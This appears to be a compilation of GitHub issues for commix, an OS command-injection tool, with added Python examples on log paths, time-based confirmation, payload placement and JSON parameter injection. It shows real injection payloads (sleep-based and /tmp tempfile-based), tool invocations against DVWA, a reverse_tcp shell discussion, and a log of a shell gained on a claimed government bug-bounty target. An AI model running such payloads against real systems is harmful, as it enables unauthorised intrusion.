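Three of the reports on this page are about the same small piece of code, the per-target log directory: "log file error" (url is None, so url.split fails), "Directory create problem" (a 'host:port' directory name that Windows rejects) and this Debian patch (logs written wherever the tool happens to be launched). The following is an added example of how that directory could be derived, not commix's implementation; the output location, the function names and the '_' substitution for the port separator are assumptions made for the illustration.

```python
"""Added example (not commix code): build the per-target log directory in a
way that avoids the three failures reported on this page: a missing URL,
a 'host:port' name that Windows rejects as a directory name, and a log
tree written into the current working directory instead of the user's home.

The '.commix-example' location, the function names and the '_' port
separator are assumptions; commix's own layout may differ.
"""
import os
import re
import tempfile
from urllib.parse import urlsplit

# Characters Windows refuses in file and directory names (plus control chars).
_UNSAFE = re.compile(r'[<>:"/\\|?*\x00-\x1f]')


def default_output_dir():
    """Keep logs under the user's home instead of the current working directory."""
    return os.path.join(os.path.expanduser("~"), ".commix-example", "output")


def target_dir_name(url):
    """Derive a filesystem-safe directory name from the target URL."""
    if not url:
        raise ValueError("a target URL is required before a log file can be created")
    parts = urlsplit(url if "//" in url else "http://" + url)   # accept bare 'host:port/path'
    if not parts.hostname:
        raise ValueError("could not extract a host from %r" % url)
    name = parts.hostname
    if parts.port:
        name += "_%d" % parts.port        # ':' is invalid in a Windows directory name
    return _UNSAFE.sub("_", name)


def create_log_dir(url, output_dir=None):
    """Create (if needed) and return the directory for this target's logs."""
    base = output_dir or default_output_dir()
    path = os.path.join(base, target_dir_name(url))
    os.makedirs(path, exist_ok=True)      # idempotent; no error if it already exists
    return path


def demo():
    """Create a log dir for the URL from the Windows report inside a temp dir."""
    base = tempfile.mkdtemp()
    path = create_log_dir("http://windows2003-sp0:8081/dilemma/default2.php?param=1", base)
    return os.path.basename(path), os.path.isdir(path)


if __name__ == "__main__":
    print(demo())
```

os.path.join also removes the hard-coded "/" separator that the original traceback shows being concatenated onto a Windows path.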

PHP Reverse TCP not working

I tried the example from https://www.youtube.com/watch?v=A57pbJA706U and the reverse_tcp is not working. Next I tried to connect to the reverse_tcp from Metasploit using telnet from a shell; it can connect just for a while.

But strangely, when I take the PHP reverse_tcp code out of ./commix/src/core/shells/reverse_tcp.py into its own file, let's say rev_tcp.php, and then try again, the reverse_tcp works.

reverse_tcp_lport doesn't show

Hi!

When I start commix with the following:

commix --url="http://192.168.1.81/dvwa/vulnerabilities/exec/" --data="ip=INJECT_HERE&submit=submit" --cookie="security=low; PHPSESSID=2a6cbc4696fc66a74670d663d7cc77f9"

I get the pseudo-terminal shell but, when I call the option "reverse_tcp", it just shows "reverse_tcp" on the command line; where is the reverse_tcp_lport option? When I call the options (the ? option) I can't see anything about this. Any documentation about this will be welcome.

Thanks.

Err in Shellshock.py

Hey,

When I tried to execute the script to check for the Shellshock vulnerability I came across the above-mentioned issue.
Add the fix to your next push :)

UnboundLocalError: local variable 'identified_os' referenced before assignment

After the latest update I am having problems employing the shellshock technique for command injection. I haven't tested any other techniques as of yet since I was working on this particular host.

commix.py --proxy=62.197.227.163:80 --shellshock --verbose --url=http://vulnhost.com/cgi-bin/wspd_cgi.sh/streamfile.p?Serial=03061&Seq=5

Returns the following error.

Traceback (most recent call last):
  File "C:\PentestBox\bin\WebApplications\commix\commix.py", line 403, in <module>
    main()
  File "C:\PentestBox\bin\WebApplications\commix\commix.py", line 247, in main
    print Style.BRIGHT + "(!) The server's operating system was identified as " + Style.UNDERLINE + identified_os  + Style.RESET_ALL + "." + Style.RESET_ALL
UnboundLocalError: local variable 'identified_os' referenced before assignment
Seq: invalid floating point argument: =1

I tried it on another host i had identified as vulnerable to shellshock and the same thing happened. I'd appreciate any help, thanks in advance.

False positive in Time-Based injection

python commix.py --url=https://www.artsy.net/search?q=INJECT_HERE --technique=Time-Based

(*) Setting the (GET) 'q' parameter for tests.
(*) Testing the time-based injection technique... [ SUCCEED ]
(!) The (GET) 'q' parameter is vulnerable to Blind-based Command Injection.
  (+) Type : Blind-based Command Injection
  (+) Technique : Time-Based Injection Technique
  (+) Payload : '| [ 6 -ne $(echo RYBYWL | tr -d '\n' | wc -c) ] || sleep 1
#

Confirmed with @stasinopoulos that this is a false positive.
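The report above turns on how a scanner decides that the trailing `|| sleep 1` actually ran. The payload's test (`[ 6 -ne $(echo RYBYWL | tr -d '\n' | wc -c) ]`) is false by construction, so a host that executes it always adds the sleep; the only question is whether one extra second can be told apart from the natural variance of a slow public search endpoint. The following is an added example, not commix's code and not part of this issue: it measures the target's baseline jitter first, refuses to conclude with a delay shorter than that jitter, and requires every repeated probe to clear the slowest baseline response. All timing samples are constructed and the function names are my own.

```python
"""Deciding whether a time-based command-injection probe really fired.

Added example (not commix's code). Every timing value below is constructed
for illustration, not measured from any real host.
"""
import math
import statistics
from typing import Dict, Sequence

# Constructed samples, in seconds. A noisy public search endpoint: plain
# requests with no payload already take between 0.4 s and 1.6 s.
NOISY_BASELINE = [0.42, 1.55, 0.61, 1.12, 0.95, 1.48, 0.73]
# The same endpoint sent a "|| sleep 1" payload that is NOT being executed:
# these timings are indistinguishable from the baseline above.
NOISY_PROBE = [1.61, 0.88, 1.52, 1.05, 1.33]

# A stable target on which a "|| sleep 2" payload really is executing.
STABLE_BASELINE = [0.11, 0.10, 0.12, 0.11, 0.10, 0.11, 0.12]
STABLE_PROBE = [2.13, 2.11, 2.12, 2.14, 2.10]


def single_shot_verdict(sample: float, delay: float) -> bool:
    """The naive rule: one request, and 'at least as slow as the sleep'
    is taken as proof that the sleep ran."""
    return sample >= delay


def minimum_usable_delay(baseline: Sequence[float]) -> int:
    """Smallest whole-second sleep that stands clear of the observed jitter.

    The sleep must be longer than the worst swing seen without any payload,
    otherwise a slow but innocent response looks exactly like a fired sleep.
    """
    spread = max(baseline) - min(baseline)
    return max(1, math.ceil(2 * spread))


def confirm_injection(baseline: Sequence[float], probes: Sequence[float],
                      delay: float) -> bool:
    """True only when the delay is usable for this target and every probe is
    slower than the slowest baseline response by at least half the delay.

    A single fast probe refutes the finding: a sleep that really executes
    server-side cannot be skipped, so it cannot produce a fast response.
    """
    if delay < minimum_usable_delay(baseline):
        return False  # too short for this target; retest with a longer sleep
    threshold = max(baseline) + delay / 2
    return all(p >= threshold for p in probes)


def report(baseline: Sequence[float], probes: Sequence[float],
           delay: float) -> Dict[str, object]:
    """Side-by-side verdicts for one target."""
    return {
        "baseline_median": round(statistics.median(baseline), 2),
        "min_usable_delay": minimum_usable_delay(baseline),
        "single_shot": single_shot_verdict(probes[0], delay),
        "confirmed": confirm_injection(baseline, probes, delay),
    }


if __name__ == "__main__":
    print("noisy target, sleep 1 :", report(NOISY_BASELINE, NOISY_PROBE, 1))
    print("stable target, sleep 2:", report(STABLE_BASELINE, STABLE_PROBE, 2))
```

On the noisy samples the single-shot rule reports a hit from the first probe alone, while the confirmation step rejects it twice over: a 1-second sleep is below the 3-second minimum that the baseline spread demands, and one probe (0.88 s) comes back faster than the slowest plain request. On the stable samples both rules agree.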

GET request + RFI

Hi, first of all: fantastic tool,
I was using DVWA with command injection and it is working as it should, but then I tried to use Remote File Inclusion and inject a backdoor via PHP code.

So the normal request via Browser that is working is: http://10.0.2.6/dvwa/vulnerabilities/fi/?page=http://10.0.2.8:81/stas.php?&addr=ls

But via commix the request is:
./commix.py --url "http://10.0.2.6/dvwa/vulnerabilities/fi/?page=http://10.0.2.8:81/stas.php?&addr=INJECT_HERE" --cookie="security=low; security_level=0; PHPSESSID=pkkj1956mfvuc8gooqaadqh3k3; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada"

Commix is starting all the tests but unfortunately it isn't found as an exploitable request.

By using a proxy I saw that commix is replacing the whole string from the first "=" ("http://10.0.2.8:81/stas.php?&addr=INJECT_HERE") and not just the INJECT_HERE after the second "=".

from burp: GET /dvwa/vulnerabilities/fi/?page=echo%20PCCYJW$((30%2B37))$(echo%20PCCYJW)PCCYJW HTTP/1.1

Is there some way I can change this behaviour, or is this a bug?

thanks
-Tili

Inject GET parameter in POST request

Hi, I like your tool a lot, but I have a problem.

here is a simplified version of what I want to do:

commix -u http://10.0.0.1/index.pl?INJECT_HERE --data=$POST_DATA

I want to inject into the URL (yes, directly after the '?'; there is no parameter name), but commix sees it's a POST request and happily starts to inject POST parameters, completely ignoring the INJECT_HERE tag in the URL. Even with a parameter name and the '-p' option it only looks for the parameter in the POST data.
ONLY POST PARAMETERS ARE TESTED.

Is there currently a way to do this? If not, I really think this should be possible with commix without having to write an HTTP proxy that adds the POST data afterwards...

Also, I miss the possibility to skip parameters/tests during testing; please tell me if this is possible.

Using version 1.3.16 as delivered in Kali Linux.

Cheers
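The two reports above (the RFI request where the proxy showed everything after the first "=" being rewritten, and the marker placed in the URL query of a request that also carries POST data) come down to the same decision: where the INJECT_HERE marker is. The following added example is not commix's own code. It puts the first-"=" split that reproduces the proxy observation beside a marker-aware placement that edits only the name=value pair containing the marker, whether that pair is in the URL query or in the POST body, and ignores the request method when deciding. The URLs are the ones from the posts; the POST body and all function names are my own.

```python
"""Placing a payload only where the INJECT_HERE marker sits.

Added example (not commix's code). Covers two situations: a GET value that
is itself a URL containing '?' and '=', and a bare marker in the URL query
of a request that also carries POST data.
"""
from typing import Optional, Tuple
from urllib.parse import quote, urlsplit, urlunsplit

MARKER = "INJECT_HERE"

# Requests taken from the two reports above.
RFI_URL = ("http://10.0.2.6/dvwa/vulnerabilities/fi/"
           "?page=http://10.0.2.8:81/stas.php?&addr=INJECT_HERE")
GET_IN_POST_URL = "http://10.0.0.1/index.pl?INJECT_HERE"
POST_DATA = "user=alice&token=abc123"   # constructed body, stands in for $POST_DATA


def naive_first_equals(url: str, payload: str) -> str:
    """The behaviour seen in the proxy: the text after the FIRST '=' of the
    query is treated as the injectable value, so 'page=' swallows the rest."""
    scheme, netloc, path, query, frag = urlsplit(url)
    name, _, _ = query.partition("=")
    return urlunsplit((scheme, netloc, path,
                       name + "=" + quote(payload, safe=""), frag))


def _substitute(query: str, encoded_payload: str) -> str:
    """Rewrite only the name=value pair that contains the marker; every other
    pair is copied byte-for-byte, so 'page=http://...stas.php?' survives."""
    pairs = []
    for pair in query.split("&"):
        name, eq, value = pair.partition("=")
        if MARKER in value:
            value = value.replace(MARKER, encoded_payload)
        elif MARKER in name:  # bare marker such as 'index.pl?INJECT_HERE'
            name = name.replace(MARKER, encoded_payload)
        pairs.append(name + eq + value)
    return "&".join(pairs)


def place_payload(url: str, data: Optional[str],
                  payload: str) -> Tuple[str, Optional[str]]:
    """Return (url, data) with the marker replaced by the URL-encoded payload.

    The marker decides the injection point, not the request method: a marker
    in the query is honoured even when a POST body is present. Exactly one
    marker is required so the tester knows which position is being tested.
    """
    scheme, netloc, path, query, frag = urlsplit(url)
    in_url = query.count(MARKER)
    in_data = (data or "").count(MARKER)
    if in_url + in_data != 1:
        raise ValueError(f"expected exactly one {MARKER}, found {in_url + in_data}")
    encoded = quote(payload, safe="")
    if in_url:
        return urlunsplit((scheme, netloc, path, _substitute(query, encoded), frag)), data
    return url, _substitute(data or "", encoded)


if __name__ == "__main__":
    print("naive :", naive_first_equals(RFI_URL, "echo PCCYJW"))
    print("marker:", place_payload(RFI_URL, None, "echo PCCYJW")[0])
    print("query marker with POST body:", place_payload(GET_IN_POST_URL, POST_DATA, "id"))
```

Splitting on "&" and then on the first "=" of each pair is what keeps the `page=` value intact: the second "?" and the "=" inside the included URL never reach the splitter as delimiters. The encoded payload goes through `quote` with an empty safe set, which is why a space becomes `%20` as in the Burp capture.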

Suggestions or issues ?

Hi there, it's a great tool you built there!
I would have 2 suggestions/issues:

  • parsing JSON parameters like in SQLmap -> it detects if the body is JSON via the header application/json, then extracts all the parameters in the JSON data
  • is the proxy option working fine? I tried to use it with Burp Suite to authenticate against an original webapp and even though it said "Testing proxy 127.0.0.1:8080... [ SUCCEED ]" I didn't see any traffic in my HTTP history in Burp Suite.

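The first suggestion above describes a feature in three steps: recognise a JSON body from the Content-Type header, enumerate its parameters, and inject into one of them. As an added example (not commix's code and not part of this issue), here is one way to do that: a recursive walk that names every scalar leaf by path (`filter.ports[1]` style), and a substitution that changes only the chosen leaf and re-serialises the document. The request headers and body are constructed for the example; the function names are my own.

```python
"""Listing and injecting JSON body parameters.

Added example (not commix's code) of the feature suggested above: detect a
JSON body from the Content-Type header, enumerate every scalar value as an
injection point addressed by path, and substitute a payload into one of them
without disturbing the rest of the document.
"""
import json
from typing import Any, Dict, List, Tuple, Union

# Constructed request; the body shape is invented for the example.
SAMPLE_HEADERS = {"Content-Type": "application/json; charset=utf-8"}
SAMPLE_BODY = ('{"user": "alice", "filter": {"host": "10.0.2.6", "ports": [22, 80]},'
               ' "verbose": true}')


def is_json_request(headers: Dict[str, str]) -> bool:
    """Header names are case-insensitive and the media type may carry
    parameters, so compare only the type before any ';'."""
    ctype = next((v for k, v in headers.items() if k.lower() == "content-type"), "")
    return ctype.split(";")[0].strip().lower() == "application/json"


def injection_points(doc: Any, path: str = "") -> List[Tuple[str, Any]]:
    """Every scalar leaf as (path, value), e.g. ('filter.ports[1]', 80).
    Non-string leaves are listed too: a tester wants to see every parameter
    even if only string values are natural hosts for an OS-command payload."""
    if isinstance(doc, dict):
        points = []
        for key, val in doc.items():
            points.extend(injection_points(val, f"{path}.{key}" if path else key))
        return points
    if isinstance(doc, list):
        points = []
        for i, val in enumerate(doc):
            points.extend(injection_points(val, f"{path}[{i}]"))
        return points
    return [(path, doc)]


def list_points(body: str) -> List[str]:
    """Paths of all injection points in a raw JSON body."""
    return [p for p, _ in injection_points(json.loads(body))]


def _tokenize(path: str) -> List[Union[str, int]]:
    """'filter.ports[1]' -> ['filter', 'ports', 1]."""
    tokens: List[Union[str, int]] = []
    for part in path.split("."):
        name, _, rest = part.partition("[")
        if name:
            tokens.append(name)
        while rest:
            idx, _, rest = rest.partition("]")
            tokens.append(int(idx))
            rest = rest.lstrip("[")
    return tokens


def inject(body: str, target_path: str, payload: str) -> str:
    """Replace the leaf at target_path with payload and re-serialise compactly.
    Only that one leaf changes; sibling keys, nesting and types are kept, so
    the server still parses the body as the client would have sent it."""
    doc = json.loads(body)
    tokens = _tokenize(target_path)
    node = doc
    for tok in tokens[:-1]:
        node = node[tok]
    node[tokens[-1]] = payload
    return json.dumps(doc, separators=(",", ":"))


if __name__ == "__main__":
    if is_json_request(SAMPLE_HEADERS):
        for path, value in injection_points(json.loads(SAMPLE_BODY)):
            print(f"{path} = {value!r}")
        print(inject(SAMPLE_BODY, "filter.host", "10.0.2.6; id"))
```

Re-serialising with `json.dumps` rather than string-replacing inside the body is what keeps the document valid when the payload contains quotes or other characters that JSON must escape.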
Related to problem after gaining shell: it doesn't work out, as shown in the picture

This is a test performed on a government bug bounty website, for the upcoming CMS (newly developed). Following a ZAP scan it found remote OS command injection and I used commix; it's not vulnerable to the other techniques except file-based and time-based. But there is a problem after gaining a shell. This is what it shows:
commix --url="http://vul url.in/search?term=INJECT_HERE" --technique=f --random-agent --hostname
[commix ASCII-art banner] { v0.1b-01d4134 }

+--
Automated All-in-One OS Command Injection and Exploitation Tool
Copyright (c) 2015 Anastasios Stasinopoulos (@ancst)
+--

(*) Checking connection to the target URL... [ SUCCEED ]
(*) Testing the file-based semiblind injection technique...
(*) Trying to upload the 'TSMRYE.txt' on /var/www/... 2% Error: It seems that you don't have permissions to write on /var/www/.
(?) Do you want to try the temporary directory (/tmp/) [Y/n] > y
(*) Trying to upload file, on temporary directory (/tmp/)...
(!) The estimated response time is 1 second.
(*) Testing the tempfile-based injection technique... [ SUCCEED ]
(!) The (GET) 'term' parameter is vulnerable to Semiblind-based Command Injection.
(+) Type : Semiblind-based Command Injection
(+) Technique : Tempfile-Based Injection Technique
(+) Payload : ; str=$(echo FSVTZZ > /tmp/FSVTZZ.txt); str=$(cat /tmp/FSVTZZ.txt); str1=${#str}; if [ 5 -ne ${str1} ]; then sleep 0; else sleep 2; fi

(*) Retrieving the length of execution output... [ SUCCEED ]
Retrieved 12 characters.
(*) Grabbing the output from '/tmp/FSVTZZ.txt', please wait... [ 100% ]

(!) The hostname is %- !$8&S,+/.

(?) Do you want a Pseudo-Terminal shell? [Y/n] > y

Pseudo-Terminal (type 'q' or use to quit)
Shell > uname

(*) Retrieving the length of execution output... [ SUCCEED ]
Retrieved 11 characters.
(*) Grabbing the output from '/tmp/FSVTZZ.txt', please wait... [ 100% ]

!?$4+G62 !/

(*) Finished in 00:04:24.

So what will be the problem exactly? The output it retrieves is not good.
